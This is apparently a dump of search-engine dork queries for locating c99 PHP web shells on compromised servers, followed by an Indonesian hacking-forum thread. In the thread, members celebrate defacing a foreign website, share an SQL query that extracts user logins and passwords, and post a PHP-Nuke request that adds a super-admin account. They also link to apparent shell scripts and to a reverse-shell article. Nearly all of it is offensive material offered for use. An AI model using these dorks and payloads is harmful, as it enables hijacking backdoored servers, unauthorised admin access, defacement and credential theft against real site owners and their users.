inurl:c99.php
inurl:"c99.php" c99shell
inurl:c99.php uid=0(root)
c99shell powered by admin
c99shell powered by admin
inurl:"/c99.php"
inurl:c99.php
inurl:c99.php
inurl:c99.php
c99 shell v.1.0 (roots)
inurl:c99.php
allintitle: "c99shell"
inurl:"c99.php
inurl:"c99.php
allinurl: "c99.php"
inurl:c99.php
intitle:C99Shell v. 1.0 pre-release +uname
intitle:C99Shell v. 1.0 pre-release +uname
allinurl: "c99.php"
inurl:c99.php
inurl:"c99.php"
inurl:"c99.php"
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:"c99.php" c99shell
inurl:c99.php
inurl:"c99.php"
allinurl:c99.php
inurl:"/c99.php
inurl:c99.php?
inurl:/c99.php+uname
allinurl:"c99.php"
allinurl:c99.php
inurl:"c99.php"
inurl:"c99.php"
allinurl:c99.php
allinurl:c99.php?
allinurl:c99.php?
allinurl:c99.php?
"inurl:c99..php"
allinurl:c99.php
c99shell [file on secure ok ]?
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:c99.php
powered by Captain Crunch Security Team
allinurl:c99.php
"c99.php" filetype:php
allinurl:c99.php
inurl:c99.php
allinurl:.c99.php
"inurl:c99.php"
c99. PHP-code Feedback Self remove
allinurl:c99.php
download c99.php
allinurl:c99.php
inurl:c99.php
allinurl: "c99.php"
allinurl:c99.php
allinurl:c99.php
c99shell
inurl:c99.php
inurl:c99.php
intitle:C99Shell v. 1.0 pre-release +uname
allinurl:"c99.php"
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:c99.php
safe-mode: off (not secure) drwxrwxrwx c99shell
inurl:/c99.php
inurl:"c99.php"
inurl:c99.php
inurl:c99.php
c99.php download
inurl:c99.php
inurl:"c99.php"
inurl:/c99.php
inurl:"c99.php?"
inurl:c99.php
inurl:c99.php
files/c99.php
c99shell filetype:php -echo
c99shell powered by admin
inurl:c99.php
inurl:c99.php
inurl:"c99.php"
inurl:c99.php uid=0(root)
allinurl:c99.php
inurl:"c99.php"
inurl:"c99.php"
inurl:"/c99.php" intitle:"C99shell"
inurl:"/c99.php" intitle:"C99shell"
inurl:"/c99.php" intitle:"C99shell"
C99Shell v. 1.0 pre-release build #5
inurl:c99.php
inurl:c99.php
--[ c99shell v. 1.0 pre-release build #16
c99shell linux infong
c99shell linux infong
C99Shell v. 1.0 pre-release build
!C99Shell v. 1.0 beta!
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
!c99shell v. 1+Safe-mode: OFF (not secure)
"C99Shell v. 1.0 pre-release build "
intitle:c99shell +filetype:php
inurl:c99.php
intitle:C99Shell v. 1.0 pre-release +uname
"Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
intitle:!C99Shell v. 1.0 pre-release build #16! root
!C99Shell v. 1.0 pre-release build #5!
inurl:"c99.php"
C99Shell v. 1.0 pre-release build #16!
c99shell v. 1.0 pre-release build #16
intitle:c99shell intext:uname
allintext:C99Shell v. 1.0 pre-release build #12
c99shell v. 1.0 pre-release build #16
--[ c99shell v. 1.0 pre-release build #15 | Powered by ]--
allinurl: "c99.php"
allinurl: "c99.php"
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
"c99shell v 1.0"
ftp apache inurl:c99.php
c99shell+v.+1.0 16
C99Shell v. 1.0 pre-release build #16 download
intitle:c99shell "Software: Apache"
allinurl: c99.php
allintext: Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove

Logout
powered by Captain Crunch Security Team
powered by Captain Crunch Security Team
!C99Shell v. 1.0 pre-release build #5!
c99shell v. 1.0 release security
c99shell v. 1.0 pre-release build
inurl:c99.php
c99shell [file on secure ok ]?
C99Shell v. 1.3
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
inurl:c99.php uid=0(root)
powered by Captain Crunch Security Team
C99Shell v. 1.0 pre-release build #16
c99shell[on file]ok
c99shell[file on ]ok
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
inurl:c99.php
"C99Shell v. 1.0 pre"
=C99Shell v. 1.0 pre-release
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
c99shell v. pre-release build
inurl:c99.php c99 shell
inurl:c99.php c99 shell
powered by Captain Crunch Security Team
inurl:c99.php
inurl:c99.php
!C99Shell v. 1.0 pre-release build #5!
intitle:"c99shell" filetype:php root
intitle:"c99shell" Linux infong 2.4
C99Shell v. 1.0 beta !
C99Shell v. 1.0 pre-release build #
inurl:"c99.php"
allintext:C99Shell v. 1.0 pre-release build #12
"C99Shell v. 1.0 pre"
powered by Captain Crunch Security Team
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
inurl:/c99.php?
allinurl:c99.php
intitle:C99Shell pre-release
inurl:"c99.php"
powered by Captain Crunch Security Team
inurl:c99.php
C99Shell v. 1.0 pre-release build #16!
allinurl:c99.php
C99Shell v. 1.0 pre-release build #16 administrator
intitle:c99shell filetype:php
powered by Captain Crunch Security Team
powered by Captain Crunch Security Team
C99Shell v. 1.0 pre-release build #12
c99shell v.1.0
allinurl:c99.php
"c99shell v. 1.0 pre-release build"
inurl:"c99.php" filetype:php
"c99shell v. 1.0 "
ok c99.php
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
c99shell v. 1.0 pre-release build #16 |
!C99Shell v. 1.0 pre-release build #5!
!C99Shell v. 1.0 pre-release build #5!
allinurl:/c99.php
powered by Captain Crunch Security Team
inurl:c99.php
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
inurl:c99.php
powered by Captain Crunch Security Team
inurl:c99.php
C99Shell v. 1.0 pre-release
inurl:c99.php
inurl:c99.php ext:php
inurl:"c99.php"
allinurl:"c99.php"
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
powered by Captain Crunch Security Team
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout"
C99Shell v. 1.0 pre-release build #16 software apache
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
"c99shell v 1.0"
inurl:"c99.php"
allintitle: C99shell filetype:php
C99Shell v. 1.0 pre-release build #16!
"c99shell v. 1.0 pre-release"
c99shell v. 1.0 pre-release build #5
allinurl:"c99.php" filetype:php
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
!C99Shell v. 1.0 pre-release build #16!
inurl:c99.php
intitle:C99Shell v. 1.0 pre-release +uname
inurl:c99.php
c99shell v. 1.0
allinurl: c99.php
--[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]--
inurl:"/c99.php"
c99shell +uname
c99shell php + uname
c99shell php + uname
--[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]--
allinurl:c99.php
!C99Shell v. 1.0 pre-release build #5!
C99Shell v.1.0 pre-release
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
inurl:c99.php
intitle:c99shell filetype:php
"Encoder Tools Proc. FTP brute"
"c99" filetype:php intext:"Safe-Mode: OFF"
c99shell v. 1.0 pre
inurl:c99.php
intitle:c99shell uname -bbpress
intitle:"index.of" c99.php
inurl:admin/files/
intitle:"index of /" "c99.php"
intitle:"index of" intext:c99.php
intitle:index.of c99.php
intitle:"index of" + c99.php
intitle:index/of file c99.php
intitle:index/of file c99.php
index of /admin/files/
intitle:"Index of/"+c99.php
c99.php "intitle:Index of "
c99.php "intitle:Index of "
c99.php "intitle:Index of "
intitle:index.of c99.php
img/c99.php
intitle:index.of c99.php
img.c99.php
intitle:"Index of/"+c99.php
"index of /" c99.php
c99.php
intitle:"Index of" c99.php
"index of" c99.php
"Index of/"+c99.php

void

09-30-2010, 09:28 AM

sorry, baru sempat posting lagi. ini ada sedikit tutorial, semoga bermanfaat :)
passwordnya ada di comment

widnyana putra

09-30-2010, 10:09 AM

keren om. :D

walopun rada puyeng bacanya.:peace:

dewaphobia

10-04-2010, 11:02 AM

website malingsia ya ? :cool:

void

10-05-2010, 11:15 AM

keren om. :D

walopun rada puyeng bacanya.:peace:

thanks bro :)
iya bener, bakal ribet bacanya soalnya lsg di dump dari terminal :D

website malingsia ya ? :cool:

bener bro, website negara tetangga :shy:

M2R

10-05-2010, 11:27 PM

nah, scanner LFI nya pake apa? :D

widnyana putra

10-07-2010, 01:04 AM

http://www.google.co.id/search?sourceid=chrome&ie=UTF-8&q=lfi+scanner
:D

ada banyak om.

^^.v

10-21-2010, 04:10 PM

ajarin cara penggunaannya juga dong. :p

dewaphobia

10-21-2010, 04:54 PM

ampuuun, otak ku nggak nyampe:o_o:

void

11-23-2010, 06:54 AM

wah, tritnya koq sepi ya? :)

select users.login,users.passwd,users.first_name from users where users.first_name like 'admin%'

http://oi51.tinypic.com/kb6k9c.jpg

e1a098243

12-13-2010, 02:18 PM

bro... kalo halaman administratornya yg ke-deface, gimana cara nangkalnya?? maksudnya, cara buat balikinnya gimana?? thanks before and after...

e1a098243

12-14-2010, 09:50 AM

bro... kalo halaman administratornya yg ke-deface, gimana cara nangkalnya?? maksudnya, cara buat balikinnya gimana?? thanks before and after...

help me dong para sesepuh deface and hacking...

void

12-14-2010, 04:22 PM

help me dong para sesepuh deface and hacking...

Coba restore dari backup bro :)

dewaphobia

12-22-2010, 07:13 AM

Coba restore dari backup bro :)

kalo belum/gk ada backupnya ? :D

void

12-22-2010, 08:22 AM

kalo belum/gk ada backupnya ? :D

Biasanya sih hosting ngasih fasilitas backup mingguan/bulanan bro (CMIIW) :)

sethakaran

12-31-2010, 11:14 PM

ikut nyimak, mendengarkan dan belajar:D

haidar145

01-03-2011, 02:12 PM

gan ..
kalo pake ini juga bisa kan ?

?op=AddAuthor&add_aid=nino&add_name=nno&add_pwd=ninoalone&add_email=nino@linuxmail.org&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox

cuman tapi kurang ampuh ya ??

tolong di perjelas lagi dong masalahnya ..
saya blum terlalu Pro ..
kwkwk ..
thx before ..

void

01-21-2011, 10:09 AM

nah, scanner LFI nya pake apa? :D

http://widyagama.ac.id/cs.txt
http://widyagama.ac.id/kcb.txt
http://widyagama.ac.id/crewet.txt

widnyana putra

02-03-2011, 12:06 AM

hadeh. tidur cuma bentar gara2 anak kos pasa ribut

ini ada sedikit bacaan "ringan" monggo dibaca
http://www.exploit-db.com/vbseo-from-xss-to-reverse-php-shell/
:wacko: :wacko: :wacko: